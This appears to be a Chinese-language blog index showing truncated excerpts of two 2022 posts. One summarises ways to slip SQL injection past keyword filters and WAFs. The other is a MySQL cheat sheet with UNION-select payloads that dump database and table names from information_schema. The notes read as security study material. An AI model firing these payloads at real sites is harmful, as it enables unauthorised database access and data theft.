sql注入绕过 今天总结一下sql注入过程中目前阶段碰到的主要过滤问题。 0x00 基本问题sql注入过程中,为了防止注入,代码中一般会进行输入字符的过滤或拦截。其中过滤指的是输入的内容被删除or替换成了别的字符,拦截指的是检测到指定内容存在后,直接返回错误,不再进行后续的操作。 0x01 and/or1.尝试双写or大小写绕过 2.运算符代替:&&,|| 3.^运算符,例如:?id&# 2022-06-16 sql #sql #WAF绕过
sql备忘录 0x01 Mysql 手工注入1.1 联合注入12345678910?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where tabl 2022-06-16 sql #sql #备忘录